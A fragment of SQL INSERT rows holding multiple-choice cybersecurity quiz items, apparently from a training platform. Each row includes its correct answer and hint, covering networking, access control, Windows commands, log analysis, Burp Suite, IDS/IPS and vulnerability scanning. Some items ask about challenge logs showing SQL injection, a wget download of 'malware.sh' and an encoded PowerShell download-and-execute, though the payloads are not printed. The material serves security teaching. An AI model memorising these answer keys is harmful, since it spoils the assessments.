(5364, 30, 'What was the stolen password in the scenario?', 2, 'SuperSecret123', 0, 'Plaintext', '2025-12-26 20:53:36', '[\"admin\", \"password\", \"123456\", \"SuperSecret123\"]'),
(5365, 30, 'How should this login be secured?', 3, 'Use HTTPS', 0, 'Encryption', '2025-12-26 20:53:36', '[\"Use Telnet\", \"Use HTTPS\", \"Change Port\", \"Use UDP\"]'),
(5366, 31, 'Which device connects different networks (Layer 3)?', 1, 'Router', 0, 'Routing decisions', '2025-12-26 20:53:36', '[\"Switch\", \"Hub\", \"Router\", \"Bridge\"]'),
(5367, 31, 'What is the loopback address for localhost?', 2, '127.0.0.1', 0, 'Home', '2025-12-26 20:53:36', '[\"192.168.1.1\", \"0.0.0.0\", \"127.0.0.1\", \"10.0.0.1\"]'),
(5368, 31, 'Which command typically checks connectivity?', 3, 'ping', 0, 'ICMP Echo', '2025-12-26 20:53:36', '[\"ipconfig\", \"ping\", \"netstat\", \"nslookup\"]'),
(5369, 31, 'What is the subnet mask for a /24 network?', 4, '255.255.255.0', 0, 'Class C default', '2025-12-26 20:53:36', '[\"255.0.0.0\", \"255.255.0.0\", \"255.255.255.0\", \"255.255.255.255\"]'),
(5370, 31, 'Which port is used by HTTP?', 5, '80', 0, 'Unencrypted Web', '2025-12-26 20:53:36', '[\"21\", \"80\", \"443\", \"25\"]'),
(5371, 31, 'Which port is used by HTTPS?', 6, '443', 0, 'Encrypted Web', '2025-12-26 20:53:36', '[\"80\", \"8080\", \"443\", \"8443\"]'),
(5372, 31, 'Which port is used by DNS?', 7, '53', 0, 'Name Resolution', '2025-12-26 20:53:36', '[\"23\", \"53\", \"67\", \"110\"]'),
(5373, 31, 'What is Layer 1 of the OSI Model?', 8, 'Physical', 0, 'Cables and bits', '2025-12-26 20:53:36', '[\"Application\", \"Data Link\", \"Physical\", \"Transport\"]'),
(5374, 31, 'How long is a standard MAC address?', 9, '48 bits', 0, 'Hardware address', '2025-12-26 20:53:36', '[\"32 bits\", \"48 bits\", \"64 bits\", \"128 bits\"]'),
(5375, 31, 'How long is an IPv6 address?', 10, '128 bits', 0, 'Modern IP', '2025-12-26 20:53:36', '[\"32 bits\", \"64 bits\", \"128 bits\", \"256 bits\"]'),
(5376, 31, 'Which protocol guarantees delivery of data?', 11, 'TCP', 0, 'Reliable', '2025-12-26 20:53:36', '[\"UDP\", \"IP\", \"TCP\", \"ICMP\"]'),
(5377, 31, 'What is the first step in the TCP Handshake?', 12, 'SYN', 0, 'Hello', '2025-12-26 20:53:36', '[\"ACK\", \"SYN\", \"SYN-ACK\", \"FIN\"]'),
(5378, 31, 'What is the first step in DHCP?', 13, 'Discover', 0, 'Looking for IP', '2025-12-26 20:53:36', '[\"Offer\", \"Request\", \"Acknowledge\", \"Discover\"]'),
(5379, 31, 'Which of the following is a private IP address?', 14, '192.168.1.50', 0, 'RFC 1918', '2025-12-26 20:53:36', '[\"8.8.8.8\", \"1.1.1.1\", \"172.50.1.1\", \"192.168.1.50\"]'),
(5380, 31, 'What does ARP do?', 15, 'Resolves IP to MAC', 0, 'Address Resolution', '2025-12-26 20:53:36', '[\"Resolves MAC to IP\", \"Resolves Name to IP\", \"Resolves IP to MAC\", \"Routes Packets\"]'),
(5381, 31, 'Which protocol is used for ping?', 16, 'ICMP', 0, 'Internet Control Message', '2025-12-26 20:53:36', '[\"TCP\", \"UDP\", \"ICMP\", \"ARP\"]'),
(5382, 31, 'Which Layer 2 device uses MAC addresses to forward frames?', 17, 'Switch', 0, 'Intelligent forwarding', '2025-12-26 20:53:36', '[\"Hub\", \"Router\", \"Switch\", \"Repeater\"]'),
(5383, 31, 'Which DNS record type stores IPv6 addresses?', 18, 'AAAA', 0, 'Quad A', '2025-12-26 20:53:36', '[\"A\", \"MX\", \"AAAA\", \"CNAME\"]'),
(5384, 31, 'What port does standard FTP use?', 19, '21', 0, 'File Transfer', '2025-12-26 20:53:36', '[\"20\", \"21\", \"22\", \"23\"]'),
(5385, 31, 'What is the primary purpose of Wireshark?', 20, 'Packet Capture', 0, 'Analysis', '2025-12-26 20:53:36', '[\"Password Cracking\", \"Packet Capture\", \"Virus Scanning\", \"Routing\"]'),
(5427, 40, 'What does the \"C\" in CIA stand for?', 1, 'Confidentiality', 0, 'Privacy', '2025-12-26 20:58:02', '[\"Control\", \"Confidentiality\", \"Certification\", \"Compliance\"]'),
(5428, 40, 'Which concept ensures data is not altered?', 2, 'Integrity', 0, 'Accuracy', '2025-12-26 20:58:02', '[\"Availability\", \"Integrity\", \"Confidentiality\", \"Authentication\"]'),
(5429, 40, 'A DDoS attack primarily targets which pillar?', 3, 'Availability', 0, 'Uptime', '2025-12-26 20:58:02', '[\"Integrity\", \"Confidentiality\", \"Availability\", \"Authorization\"]'),
(5430, 41, 'Which is \"Something You Are\"?', 1, 'Biometrics', 0, 'Body part', '2025-12-26 20:58:02', '[\"Password\", \"Smart Card\", \"Biometrics\", \"Location\"]'),
(5431, 41, 'Which fits \"Something You Have\"?', 2, 'Smart Card', 0, 'Physical token', '2025-12-26 20:58:02', '[\"PIN\", \"Password\", \"Smart Card\", \"Typing Speed\"]'),
(5432, 41, 'Using a Password and a Fingerprint is an example of what?', 3, 'MFA', 0, 'Multi-Factor', '2025-12-26 20:58:02', '[\"Single Sign On\", \"MFA\", \"Authorization\", \"Encryption\"]'),
(5433, 42, 'Which comes first?', 1, 'Authentication', 0, 'Who are you?', '2025-12-26 20:58:02', '[\"Authorization\", \"Authentication\", \"Accounting\", \"Auditing\"]'),
(5434, 42, 'Which model uses security labels (Top Secret)?', 2, 'MAC', 0, 'Mandatory', '2025-12-26 20:58:02', '[\"DAC\", \"RBAC\", \"MAC\", \"ABAC\"]'),
(5435, 42, 'The principle of giving minimum necessary rights is called?', 3, 'Least Privilege', 0, 'Minimal', '2025-12-26 20:58:02', '[\"Zero Trust\", \"Least Privilege\", \"Defense in Depth\", \"Separation of Duties\"]'),
(5436, 43, 'Which AAA component tracks user actions?', 1, 'Accounting', 0, 'Logs', '2025-12-26 20:58:02', '[\"Authentication\", \"Authorization\", \"Accounting\", \"Access\"]'),
(5437, 43, 'Preventing a user from checking or denying an action is called?', 2, 'Non-Repudiation', 0, 'Undeniable', '2025-12-26 20:58:02', '[\"Integrity\", \"Encryption\", \"Non-Repudiation\", \"Availability\"]'),
(5438, 43, 'What is a primary use of Accounting logs?', 3, 'Forensics', 0, 'Investigation', '2025-12-26 20:58:02', '[\"Speed\", \"Encryption\", \"Forensics\", \"Routing\"]'),
(5439, 44, 'Which encryption uses the SAME key for locking and unlocking?', 1, 'Symmetric', 0, 'Single Key', '2025-12-26 20:58:02', '[\"Asymmetric\", \"Symmetric\", \"Hashing\", \"Public Key\"]'),
(5440, 44, 'Which algorithm is the current gold standard for symmetric encryption?', 2, 'AES', 0, 'Advanced Encryption Standard', '2025-12-26 20:58:02', '[\"DES\", \"AES\", \"MD5\", \"RSA\"]'),
(5441, 44, 'What is Plaintext?', 3, 'Readable data', 0, 'Unencrypted', '2025-12-26 20:58:02', '[\"Ciphertext\", \"Hashed data\", \"Readable data\", \"Key\"]'),
(5442, 45, 'Is hashing reversible?', 1, 'No', 0, 'One-way function', '2025-12-26 20:58:02', '[\"Yes\", \"No\", \"Only with a key\", \"Only for admins\"]'),
(5443, 45, 'What is the primary goal of hashing?', 2, 'Integrity', 0, 'Fingerprinting', '2025-12-26 20:58:02', '[\"Confidentiality\", \"Availability\", \"Integrity\", \"Speed\"]'),
(5444, 45, 'Which hashing algorithm is considered secure today?', 3, 'SHA-256', 0, 'Standard', '2025-12-26 20:58:02', '[\"MD5\", \"SHA-1\", \"SHA-256\", \"ROT13\"]'),
(5445, 46, 'What is another name for Defense in Depth?', 1, 'Layered Security', 0, 'Onion', '2025-12-26 20:58:02', '[\"Single Point of Failure\", \"Layered Security\", \"Zero Trust\", \"Active Defense\"]'),
(5446, 46, 'Which layer involves educating users?', 2, 'Human', 0, 'Training', '2025-12-26 20:58:02', '[\"Physical\", \"Network\", \"Human\", \"Application\"]'),
(5447, 46, 'Why use multiple layers?', 3, 'Redundancy', 0, 'If one fails', '2025-12-26 20:58:02', '[\"Cost savings\", \"Redundancy\", \"Simplicity\", \"Speed\"]'),
(5448, 47, 'What fundamental triad models information security?', 1, 'CIA', 0, 'Confidentiality Integrity Availability', '2025-12-26 20:58:02', '[\"ABC\", \"CIA\", \"RGB\", \"SSH\"]'),
(5449, 47, 'Which element of CIA ensures systems are up and running?', 2, 'Availability', 0, 'Uptime', '2025-12-26 20:58:02', '[\"Confidentiality\", \"Integrity\", \"Availability\", \"Authentication\"]'),
(5450, 47, 'Fingerprints and Retina scans are examples of?', 3, 'Biometrics', 0, 'Something you are', '2025-12-26 20:58:02', '[\"Passwords\", \"Tokens\", \"Biometrics\", \"Smart Cards\"]'),
(5451, 47, 'Identifying a user is called?', 4, 'Authentication', 0, 'AuthN', '2025-12-26 20:58:02', '[\"Authorization\", \"Accounting\", \"Authentication\", \"Access\"]'),
(5452, 47, 'Determining what a user is allowed to do is?', 5, 'Authorization', 0, 'AuthZ', '2025-12-26 20:58:02', '[\"Authentication\", \"Accounting\", \"Authorization\", \"Auditing\"]'),
(5453, 47, 'Which access control model uses \"Top Secret\" labels?', 6, 'MAC', 0, 'Mandatory', '2025-12-26 20:58:02', '[\"DAC\", \"MAC\", \"RBAC\", \"Rule-Based\"]'),
(5454, 47, 'Which access control model relies on the data owner?', 7, 'DAC', 0, 'Discretionary', '2025-12-26 20:58:02', '[\"MAC\", \"DAC\", \"RBAC\", \"ABAC\"]'),
(5455, 47, 'Tracking user activities in logs is known as?', 8, 'Accounting', 0, 'The 3rd A', '2025-12-26 20:58:02', '[\"Authentication\", \"Authorization\", \"Accounting\", \"Analysis\"]'),
(5456, 47, 'Which type of encryption uses a Public and Private key?', 9, 'Asymmetric', 0, 'Two keys', '2025-12-26 20:58:03', '[\"Symmetric\", \"Asymmetric\", \"Hashing\", \"Linear\"]'),
(5457, 47, 'Which type of encryption uses a single shared key?', 10, 'Symmetric', 0, 'Faster', '2025-12-26 20:58:03', '[\"Asymmetric\", \"Symmetric\", \"Hashing\", \"Private\"]'),
(5458, 47, 'Which function is One-Way and non-reversible?', 11, 'Hashing', 0, 'Fingerprint', '2025-12-26 20:58:03', '[\"Encryption\", \"Encoding\", \"Hashing\", \"Compression\"]'),
(5459, 47, 'Which is a secure hashing algorithm?', 12, 'SHA-256', 0, 'Modern', '2025-12-26 20:58:03', '[\"MD5\", \"SHA-1\", \"SHA-256\", \"CRC32\"]'),
(5460, 47, 'What is the best defense against social engineering?', 13, 'User Training', 0, 'Human layer', '2025-12-26 20:58:03', '[\"Firewalls\", \"Encryption\", \"User Training\", \"Biometrics\"]'),
(5461, 47, 'Layering multiple security controls is called?', 14, 'Defense in Depth', 0, 'Onion', '2025-12-26 20:58:03', '[\"Offense in Depth\", \"Defense in Depth\", \"Single Defense\", \"Zero Security\"]'),
(5462, 47, 'What does Non-Repudiation provide?', 15, 'Proof of origin', 0, 'Cannot deny', '2025-12-26 20:58:03', '[\"Privacy\", \"Proof of origin\", \"Speed\", \"Availability\"]'),
(5463, 47, 'Which helps protect Data Integrity?', 16, 'Hashing', 0, 'Check change', '2025-12-26 20:58:03', '[\"Encryption\", \"Hashing\", \"Backups\", \"Firewalls\"]'),
(5464, 47, 'What does MFA stand for?', 17, 'Multi-Factor Authentication', 0, '2+ factors', '2025-12-26 20:58:03', '[\"Multi-Factor Authorization\", \"Multi-Function Access\", \"Multi-Factor Authentication\", \"Main Factor Auth\"]'),
(5465, 47, 'Is a password \"Something you have\"?', 18, 'No', 0, 'Something you know', '2025-12-26 20:58:03', '[\"Yes\", \"No\", \"Depends\", \"Sometimes\"]'),
(5466, 47, 'Which layer of Defense in Depth includes Firewalls?', 19, 'Network', 0, 'Perimeter', '2025-12-26 20:58:03', '[\"Physical\", \"Network\", \"Human\", \"Data\"]'),
(5467, 47, 'Which is NOT a pillar of the CIA triad?', 20, 'Authorization', 0, 'Not C-I-A', '2025-12-26 20:58:03', '[\"Confidentiality\", \"Integrity\", \"Availability\", \"Authorization\"]'),
(5483, 48, 'Which command lists files?', 1, 'dir', 0, 'Directory', '2025-12-26 21:05:12', '[\"ls\", \"list\", \"dir\", \"show\"]'),
(5484, 48, 'How do you enter the \"Documents\" folder?', 2, 'cd Documents', 0, 'Change Directory', '2025-12-26 21:05:12', '[\"dir Documents\", \"cd Documents\", \"enter Documents\", \"go Documents\"]'),
(5485, 48, 'What does \"cd ..\" do?', 3, 'Go back one level', 0, 'Parent directory', '2025-12-26 21:05:12', '[\"Deletes folder\", \"Go back one level\", \"Go to root\", \"Nothing\"]'),
(5486, 49, 'Which command reads a file content?', 1, 'type', 0, 'Type out', '2025-12-26 21:05:12', '[\"read\", \"cat\", \"type\", \"open\"]'),
(5487, 49, 'If you want to read \"note.txt\", what do you type?', 2, 'type note.txt', 0, 'Command + Arg', '2025-12-26 21:05:12', '[\"read note.txt\", \"type note.txt\", \"cat note.txt\", \"open note.txt\"]'),
(5488, 49, 'Is \"cat\" a standard Windows command?', 3, 'No', 0, 'type is used', '2025-12-26 21:05:12', '[\"Yes\", \"No\", \"Maybe\", \"Only in PowerShell\"]'),
(5489, 50, 'Which command shows the computer name?', 1, 'hostname', 0, 'Host', '2025-12-26 21:05:12', '[\"name\", \"hostname\", \"computername\", \"id\"]'),
(5490, 50, 'Which command shows the current user?', 2, 'whoami', 0, 'Identity', '2025-12-26 21:05:12', '[\"user\", \"me\", \"whoami\", \"id\"]'),
(5491, 50, 'Why is \"whoami\" important?', 3, 'To check permissions', 0, 'Privilege level', '2025-12-26 21:05:12', '[\"To check time\", \"To check IP\", \"To check permissions\", \"To list files\"]'),
(5492, 51, 'Which command shows IP details on Windows?', 1, 'ipconfig', 0, 'IP Config', '2025-12-26 21:05:12', '[\"ifconfig\", \"ipconfig\", \"ip a\", \"net config\"]'),
(5493, 51, 'What does Default Gateway usually represent?', 2, 'The Router', 0, 'Exit point', '2025-12-26 21:05:12', '[\"The PC\", \"The Router\", \"The Server\", \"The DNS\"]'),
(5494, 51, 'What is a common local IP starting with?', 3, '192.168', 0, 'Private range', '2025-12-26 21:05:12', '[\"8.8.8\", \"192.168\", \"1.1.1\", \"255.255\"]'),
(5495, 52, 'Which command lists running processes?', 1, 'tasklist', 0, 'List tasks', '2025-12-26 21:05:12', '[\"ps\", \"tasklist\", \"proclist\", \"top\"]'),
(5496, 52, 'What does PID stand for?', 2, 'Process ID', 0, 'Identifier', '2025-12-26 21:05:12', '[\"Program ID\", \"Process ID\", \"Personal ID\", \"Path ID\"]'),
(5497, 52, 'Which switch is used to kill by PID?', 3, '/PID', 0, 'Switch', '2025-12-26 21:05:12', '[\"-p\", \"/PID\", \"-id\", \"--pid\"]'),
(5522, 54, 'What is the severity level of the Challenge Log?', 1, 'ERROR', 0, 'Keyword after timestamp', '2025-12-26 21:12:59', '[\"INFO\", \"DEBUG\", \"ERROR\", \"FATAL\"]'),
(5523, 54, 'Which user was involved in the event?', 2, 'db_admin', 0, 'User field', '2025-12-26 21:12:59', '[\"alice\", \"admin\", \"db_admin\", \"root\"]'),
(5524, 54, 'What database was being accessed?', 3, 'users_db', 0, 'Accessing...', '2025-12-26 21:12:59', '[\"auth_db\", \"users_db\", \"main_db\", \"logs\"]'),
(5525, 55, 'How many failed attempts are shown?', 1, '2', 0, 'Count \"Failed\"', '2025-12-26 21:12:59', '[\"1\", \"2\", \"3\", \"0\"]'),
(5526, 55, 'Which user successfully logged in?', 2, 'root', 0, 'Look for \"Accepted\"', '2025-12-26 21:12:59', '[\"guest\", \"admin\", \"root\", \"user\"]'),
(5527, 55, 'What port is the SSH server running on?', 3, '2222', 0, 'port ...', '2025-12-26 21:12:59', '[\"22\", \"80\", \"2222\", \"443\"]'),
(5528, 56, 'What HTTP method was used in the challenge?', 1, 'POST', 0, 'First word inside quotes', '2025-12-26 21:12:59', '[\"GET\", \"POST\", \"PUT\", \"HEAD\"]'),
(5529, 56, 'What status code was returned?', 2, '401', 0, 'Number after HTTP version', '2025-12-26 21:12:59', '[\"200\", \"404\", \"401\", \"500\"]'),
(5530, 56, 'What page was requested?', 3, '/admin/login.php', 0, 'Path', '2025-12-26 21:12:59', '[\"/index.html\", \"/admin/login.php\", \"/login\", \"/home\"]'),
(5531, 57, 'What is the specific failure reason?', 1, 'Account locked out', 0, 'Read Failure Reason', '2025-12-26 21:12:59', '[\"Bad password\", \"Account locked out\", \"Unknown user\", \"Wrong domain\"]'),
(5532, 57, 'What is the Event ID?', 2, '4625', 0, 'Top line', '2025-12-26 21:12:59', '[\"4624\", \"4625\", \"4672\", \"1000\"]'),
(5533, 57, 'Which IP address initiated the request?', 3, '10.0.0.88', 0, 'Source Network Address', '2025-12-26 21:12:59', '[\"127.0.0.1\", \"10.0.0.88\", \"192.168.1.1\", \"0.0.0.0\"]'),
(5534, 58, 'What SQL command is visible in the URL?', 1, 'UNION SELECT', 0, 'Keyword', '2025-12-26 21:12:59', '[\"DROP TABLE\", \"UNION SELECT\", \"UPDATE\", \"INSERT\"]'),
(5535, 58, 'What does %27 represent in URL encoding?', 2, 'Single Quote (\')', 0, 'Hex for quote', '2025-12-26 21:12:59', '[\"Space\", \"Single Quote (\')\", \"Double Quote (\\\")\", \"Percent Sign\"]'),
(5536, 58, 'Did the server block this request?', 3, 'No (Status 200)', 0, 'Status code', '2025-12-26 21:12:59', '[\"Yes (403)\", \"No (Status 200)\", \"Yes (500)\", \"Maybe\"]'),
(5537, 59, 'What describes the destination port 3389?', 1, 'RDP (Remote Desktop)', 0, 'Common Port', '2025-12-26 21:12:59', '[\"SSH\", \"HTTP\", \"RDP (Remote Desktop)\", \"FTP\"]'),
(5538, 59, 'What flag indicates a connection attempt?', 2, 'SYN', 0, 'TCP Flag', '2025-12-26 21:12:59', '[\"ACK\", \"SYN\", \"FIN\", \"RST\"]'),
(5539, 59, 'Was the connection allowed?', 3, 'No (DROP)', 0, 'Action', '2025-12-26 21:12:59', '[\"Yes (ACCEPT)\", \"No (DROP)\", \"Logged only\", \"Unknown\"]'),
(5540, 60, 'What malicious command is being downloaded?', 1, 'malware.sh', 0, 'File name', '2025-12-26 21:12:59', '[\"virus.exe\", \"malware.sh\", \"test.txt\", \"config.php\"]'),
(5541, 60, 'What tool is used to download the file?', 2, 'wget', 0, 'Command', '2025-12-26 21:12:59', '[\"curl\", \"wget\", \"cat\", \"ping\"]'),
(5542, 60, 'What character is encoded as %7C?', 3, 'Pipe (|)', 0, 'Separator', '2025-12-26 21:12:59', '[\"Semicolon (;)\", \"Pipe (|)\", \"Ampersand (&)\", \"Space\"]'),
(5543, 61, 'What does the decoded command try to do?', 1, 'Download a script', 0, 'DownloadString', '2025-12-26 21:12:59', '[\"Delete files\", \"Download a script\", \"Encrypt drive\", \"Add user\"]'),
(5544, 61, 'What command is executed after downloading?', 2, 'IEX (Invoke-Expression)', 0, 'First word decoded', '2025-12-26 21:12:59', '[\"cmd.exe\", \"IEX (Invoke-Expression)\", \"Start-Process\", \"Write-Host\"]'),
(5545, 61, 'What parameter indicates the command is encoded?', 3, '-Enc', 0, 'Short for -EncodedCommand', '2025-12-26 21:12:59', '[\"-NoP\", \"-NonI\", \"-W\", \"-Enc\"]'),
(5546, 72, 'What describes a Forward Proxy?', 1, 'Acts for the client', 0, 'School/Work proxy', '2025-12-26 21:17:42', '[\"Acts for the server\", \"Acts for the client\", \"Is a VPN\", \"Is a firewall\"]'),
(5547, 72, 'What is the main role of an Intercepting Proxy?', 2, 'View/Modify traffic', 0, 'MitM', '2025-12-26 21:17:42', '[\"Speed up internet\", \"View/Modify traffic\", \"Encrypt data\", \"Host websites\"]'),
(5548, 72, 'What typically uses a Reverse Proxy?', 3, 'High traffic servers', 0, 'Load balancing', '2025-12-26 21:17:42', '[\"Home users\", \"High traffic servers\", \"Laptops\", \"Printers\"]'),
(5549, 73, 'What is Burp Suite primarily used for?', 1, 'Web Security Testing', 0, 'Hacking apps', '2025-12-26 21:17:42', '[\"Network Scanning\", \"Web Security Testing\", \"Password Management\", \"Virus Scanning\"]'),
(5550, 73, 'Which component allows modifying and re-sending individual requests?', 2, 'Repeater', 0, 'Repeat', '2025-12-26 21:17:42', '[\"Proxy\", \"Scanner\", \"Repeater\", \"Intruder\"]'),
(5551, 73, 'Which component is used for automated attacks?', 3, 'Intruder', 0, 'Brute force', '2025-12-26 21:17:42', '[\"Repeater\", \"Intruder\", \"Decoder\", \"Comparer\"]'),
(5552, 74, 'What happens when \"Intercept is On\"?', 1, 'Requests hang/pause', 0, 'Waiting for you', '2025-12-26 21:17:42', '[\"Requests go faster\", \"Requests hang/pause\", \"Browser closes\", \"Server errors\"]'),
(5553, 74, 'Why would you modify the User-Agent header?', 2, 'Pretend to be a specific device', 0, 'Mobile testing', '2025-12-26 21:17:42', '[\"To hack wifi\", \"Pretend to be a specific device\", \"To clear cache\", \"To speed up login\"]'),
(5554, 74, 'What allows you to send the paused request to the server?', 3, 'Forward button', 0, 'Action', '2025-12-26 21:17:42', '[\"Drop button\", \"Forward button\", \"Stop button\", \"Delete button\"]'),
(5555, 75, 'Why use Repeater instead of the browser?', 1, 'Faster iteration', 0, 'Testing variations', '2025-12-26 21:17:42', '[\"Better graphics\", \"Faster iteration\", \"Browser is blocked\", \"It is automatic\"]'),
(5556, 75, 'What does %20 represent in URL encoding?', 2, 'Space', 0, 'Whitespace', '2025-12-26 21:17:42', '[\"Tab\", \"Enter\", \"Space\", \"Slash\"]'),
(5557, 75, 'What tool converts Base64 back to text?', 3, 'Decoder', 0, 'Decode', '2025-12-26 21:17:42', '[\"Encoder\", \"Decoder\", \"Translator\", \"Compiler\"]'),
(5558, 76, 'What happens in a proxy chain?', 1, 'Traffic hops through multiple nodes', 0, 'A->B->C', '2025-12-26 21:17:42', '[\"Traffic is blocked\", \"Traffic hops through multiple nodes\", \"Traffic is deleted\", \"Traffic is faster\"]'),
(5559, 76, 'What is the main difference between Proxy and VPN?', 2, 'VPN encrypts entire device traffic', 0, 'Scope', '2025-12-26 21:17:42', '[\"Proxy is faster\", \"VPN is free\", \"VPN encrypts entire device traffic\", \"Proxy is hardware\"]'),
(5560, 76, 'If you chain A->B->C, who does the Target see?', 3, 'Proxy C', 0, 'The last one', '2025-12-26 21:17:42', '[\"You\", \"Proxy A\", \"Proxy B\", \"Proxy C\"]'),
(5693, 77, 'Which system is typically deployed \"Inline\"?', 1, 'IPS', 0, 'Intrusion Prevention', '2025-12-26 22:11:01', '[\"IDS\", \"IPS\", \"SIEM\", \"TAP\"]'),
(5694, 77, 'What happens if an Out-of-Band IDS crashes?', 2, 'Traffic continues (Fail Open)', 0, 'Loss of visibility only', '2025-12-26 22:11:01', '[\"Network outage\", \"Traffic continues (Fail Open)\", \"Firewall locks down\", \"Servers reboot\"]'),
(5695, 77, 'Why is IPS riskier than IDS?', 3, 'Can block legitimate traffic', 0, 'Business interruption', '2025-12-26 22:11:01', '[\"It is more expensive\", \"It is slower\", \"Can block legitimate traffic\", \"It uses more power\"]'),
(5696, 78, 'Which detection method is best for known threats?', 1, 'Signature-Based', 0, 'Fast and accurate', '2025-12-26 22:11:01', '[\"Anomaly-Based\", \"Signature-Based\", \"Heuristic\", \"AI\"]'),
(5697, 78, 'What is the main advantage of Anomaly detection?', 2, 'Detecting Zero-Days', 0, 'Unknown threats', '2025-12-26 22:11:01', '[\"Speed\", \"Low cost\", \"Detecting Zero-Days\", \"Low false positives\"]'),
(5698, 78, 'What triggers an anomaly alert?', 3, 'Deviation from baseline', 0, 'Unusual behavior', '2025-12-26 22:11:01', '[\"A signature match\", \"A blacklisted IP\", \"Deviation from baseline\", \"A specific file hash\"]'),
(5699, 79, 'What is the major blind spot of NIDS today?', 1, 'Encrypted Traffic (HTTPS)', 0, 'Encryption', '2025-12-26 22:11:01', '[\"Speed\", \"Encrypted Traffic (HTTPS)\", \"UDP Packets\", \"IPv6\"]'),
(5700, 79, 'Where does HIDS sit in the encryption chain?', 2, 'After decryption', 0, 'On the host', '2025-12-26 22:11:01', '[\"Before encryption\", \"After decryption\", \"In the router\", \"On the switch\"]'),
(5701, 79, 'Which capability is unique to HIDS?', 3, 'File Integrity Monitoring', 0, 'FIM', '2025-12-26 22:11:01', '[\"Packet Capture\", \"Flow Analysis\", \"File Integrity Monitoring\", \"DDoS Protection\"]'),
(5702, 81, 'How does Zeek primarily store data?', 1, 'Transaction Logs', 0, 'Metadata', '2025-12-26 22:11:01', '[\"Full Packet Capture\", \"Transaction Logs\", \"SQL Database\", \"Binary Blobs\"]'),
(5703, 81, 'Which log file contains the volume of data transferred?', 2, 'conn.log', 0, 'Connection', '2025-12-26 22:11:01', '[\"files.log\", \"conn.log\", \"http.log\", \"stats.log\"]'),
(5704, 81, 'Can Zeek detect anomalies in encrypted traffic?', 3, 'Yes (via metadata)', 0, 'Byte counts', '2025-12-26 22:11:01', '[\"No\", \"Yes (via metadata)\", \"Only if decrypted\", \"Never\"]'),
(5705, 82, 'What is the best way to tell if an attack succeeded?', 1, 'Check the Server Response', 0, 'Response Code', '2025-12-26 22:11:01', '[\"Check the Source IP\", \"Check the Server Response\", \"Check the Timestamp\", \"Check the Rule ID\"]'),
(5706, 82, 'If a payload appears in an email body triggering an alert, it is likely a?', 2, 'False Positive', 0, 'Context mismatch', '2025-12-26 22:11:01', '[\"True Positive\", \"False Positive\", \"Zero Day\", \"Insider Threat\"]'),
(5707, 82, 'A \"404 Not Found\" response generally indicates?', 3, 'Attempt Failed', 0, 'Target does not exist', '2025-12-26 22:11:01', '[\"Successful Hack\", \"Attempt Failed\", \"Server Offline\", \"IDS Failure\"]'),
(5708, 83, 'What is the standard solution for internal scanners triggering alerts?', 1, 'Whitelisting', 0, 'Ignoring IP', '2025-12-26 22:11:01', '[\"Blocking them\", \"Whitelisting\", \"Counter-attacking\", \"Disabling the IDS\"]'),
(5709, 83, 'What technique limits alerts to \"X times per minute\"?', 2, 'Thresholding', 0, 'Suppression', '2025-12-26 22:11:01', '[\"Whitelisting\", \"Thresholding\", \"Dropping\", \"Sampling\"]'),
(5710, 83, 'Why might P2P updates trigger alerts?', 3, 'Look like Botnet traffic', 0, 'Behavior', '2025-12-26 22:11:01', '[\"They are viruses\", \"Look like Botnet traffic\", \"They are unencrypted\", \"They are slow\"]'),
(5711, 84, 'What is the first step before you can scan?', 1, 'Discovery / Asset Management', 0, 'Knowing what to scan', '2025-12-26 22:11:01', '[\"Remediation\", \"Prioritization\", \"Discovery / Asset Management\", \"Reporting\"]'),
(5712, 84, 'Why is \"Verification\" necessary after patching?', 2, 'To ensure patch was applied correctly', 0, 'Trust but verify', '2025-12-26 22:11:01', '[\"It isn\'t\", \"To ensure patch was applied correctly\", \"To double billing\", \"To slow down IT\"]'),
(5713, 84, 'What is \"Shadow IT\"?', 3, 'Unknown/Unmanaged assets', 0, 'Hidden servers', '2025-12-26 22:11:01', '[\"Hacker tools\", \"Unknown/Unmanaged assets\", \"Dark mode\", \"VPNs\"]'),
(5714, 85, 'Which scan type is less accurate finding missing patches?', 1, 'Unauthenticated', 0, 'External', '2025-12-26 22:11:01', '[\"Authenticated\", \"Unauthenticated\", \"Agent-based\", \"Internal\"]'),
(5715, 85, 'How does an authenticated scan check for patches?', 2, 'Logs in and checks files/registry', 0, 'Commands', '2025-12-26 22:11:01', '[\"Guesses\", \"Checks headers\", \"Logs in and checks files/registry\", \"Port scan\"]'),
(5716, 85, 'What is a common issue with \"Banner Grabbing\"?', 3, 'Banners can act or lie', 0, 'Inaccurate', '2025-12-26 22:11:01', '[\"It causes crashes\", \"Banners can act or lie\", \"It requires passwords\", \"It is too slow\"]'),
(5717, 86, 'What does \"AV:N\" stand for?', 1, 'Attack Vector: Network', 0, 'Remote', '2025-12-26 22:11:01', '[\"Attack Vector: None\", \"Attack Vector: Network\", \"Anti-Virus: None\", \"Admin View: No\"]'),
(5718, 86, 'Which metric indicates user interaction is NOT needed?', 2, 'UI:N', 0, 'Automatic', '2025-12-26 22:11:01', '[\"UI:R\", \"UI:N\", \"PR:N\", \"AV:L\"]'),
(5719, 86, 'A \"Scope Change\" (S:C) usually implies what?', 3, 'Breaking out of sandbox/VM', 0, 'Higher impact', '2025-12-26 22:11:01', '[\"Local only\", \"Breaking out of sandbox/VM\", \"Lower score\", \"Network only\"]'),
(5720, 87, 'Why should you place local scanners in each network segment?', 1, 'To avoid scanning through firewalls', 0, 'Efficiency', '2025-12-26 22:11:01', '[\"To waste money\", \"To avoid scanning through firewalls\", \"Because Nessus requires it\", \"To use more IPs\"]'),
(5721, 87, 'Which scan policy is best for solely finding live hosts?', 2, 'Host Discovery', 0, 'Ping sweep', '2025-12-26 22:11:01', '[\"Basic Network Scan\", \"Web App Scan\", \"Host Discovery\", \"Malware Scan\"]'),
(5722, 87, 'Why avoid scanning SCADA/Printers with aggressive policies?', 3, 'They are fragile and can crash', 0, 'Stability', '2025-12-26 22:11:01', '[\"They have no vulns\", \"They are fragile and can crash\", \"They are strictly read-only\", \"Nessus cannot scan them\"]'),
(5723, 88, 'If \"Exploit Available\" is Yes, what does that mean?', 1, 'Hackable tools exist publicly', 0, 'Urgent', '2025-12-26 22:11:01', '[\"It is theoretical\", \"Hackable tools exist publicly\", \"It is a zero-day\", \"It involves money\"]'),
(5724, 88, 'What does VPR add to the standard CVSS score?', 2, 'Real-world threat context', 0, 'Intel', '2025-12-26 22:11:01', '[\"Nothing\", \"Real-world threat context\", \"User opinion\", \"Randomness\"]'),
(5725, 88, 'What is the first filter you should typically apply?', 3, 'Severity (Crit/High)', 0, 'Triage', '2025-12-26 22:11:01', '[\"Low/Info\", \"Severity (Crit/High)\", \"Port 80\", \"Name\"]'),
